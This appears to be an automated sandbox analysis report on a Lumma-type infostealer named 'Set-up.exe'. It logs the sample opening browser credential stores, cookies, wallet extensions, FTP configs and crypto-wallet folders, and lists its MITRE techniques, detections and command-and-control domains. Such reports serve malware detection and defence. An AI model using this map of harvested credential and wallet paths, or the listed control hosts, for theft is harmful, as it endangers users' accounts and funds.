              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\'Set-up.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 'Set-up.exe PID: 3940, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: 'Set-up.exe PID: 3940, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; bracketed numbers are the count badges shown in the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation [12]; PowerShell [1]; At; Cron; Launchd
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion [21]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; Software Packing
Credential Access: OS Credential Dumping [2]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery [221]; Virtualization/Sandbox Evasion [21]; Process Discovery [1]; File and Directory Discovery [1]; System Information Discovery [22]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Archive Collected Data [1]; Data from Local System [41]; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [113]; Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Behavior Graph ID: 1584523 | Sample: 'Set-up.exe | Start date: 05/01/2025 | Architecture: WINDOWS | Score: 100
• Sample node: passhudmrue.click; Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures; 'Set-up.exe started
• Process node 'Set-up.exe: passhudmrue.click 172.67.178.174, 443, 49769, 49778, CLOUDFLARENETUS, United States; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); 4 other signatures

Source | Detection | Scanner | Label
'Set-up.exe | 19% | Virustotal |
'Set-up.exe | 18% | ReversingLabs | Win32.Ransomware.LummaCStealer
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://passhudmrue.click/rx | 0% | Avira URL Cloud | safe
http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar | 0% | Avira URL Cloud | safe
https://passhudmrue.click:443/api | 0% | Avira URL Cloud | safe
https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc= | 0% | Avira URL Cloud | safe
https://passhudmrue.click/api | 0% | Avira URL Cloud | safe
https://passhudmrue.click/api?l/h | 0% | Avira URL Cloud | safe
https://vivporn.com/wp-content/plugins/ | 0% | Avira URL Cloud | safe
https://passhudmrue.click/t | 0% | Avira URL Cloud | safe
https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com | 0% | Avira URL Cloud | safe
https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=% | 0% | Avira URL Cloud | safe
https://passhudmrue.click/apis | 0% | Avira URL Cloud | safe
https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&em | 0% | Avira URL Cloud | safe
https://passhudmrue.click/api9T) | 0% | Avira URL Cloud | safe
https://passhudmrue.click/c | 0% | Avira URL Cloud | safe
https://www.tomabo.com/mp4-player/download.html | 0% | Avira URL Cloud | safe
https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.c | 0% | Avira URL Cloud | safe
https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile | 0% | Avira URL Cloud | safe
passhudmrue.click | 0% | Avira URL Cloud | safe
https://passhudmrue.click/e | 0% | Avira URL Cloud | safe
https://passhudmrue.click/apiQ. | 0% | Avira URL Cloud | safe
https://passhudmrue.click/ | 0% | Avira URL Cloud | safe
https://www.hotmovs.com/ | 0% | Avira URL Cloud | safe
https://passhudmrue.click/apiNp | 0% | Avira URL Cloud | safe
https://www.tomabo.com/videos/dog-and-balls.mp4Please | 0% | Avira URL Cloud | safe
https://passhudmrue.click/44 | 0% | Avira URL Cloud | safe
https://passhudmrue.click/apihF) | 0% | Avira URL Cloud | safe
https://passhudmrue.click/0 | 0% | Avira URL Cloud | safe
https://passhudmrue.click/N | 0% | Avira URL Cloud | safe
https://passhudmrue.click/R | 0% | Avira URL Cloud | safe
https://www.tomabo.comVersion | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
passhudmrue.click | 172.67.178.174 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://passhudmrue.click/api | true | Avira URL Cloud: safe | unknown
passhudmrue.click | true | Avira URL Cloud: safe | unknown
rabidcowse.shop | false | | high
wholersorie.shop | false | | high
cloudewahsj.shop | false | | high
noisycuttej.shop | false | | high
nearycrepso.shop | false | | high
framekgirus.shop | false | | high
tirepublicerj.shop | false | | high
abruptyopsn.shop | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
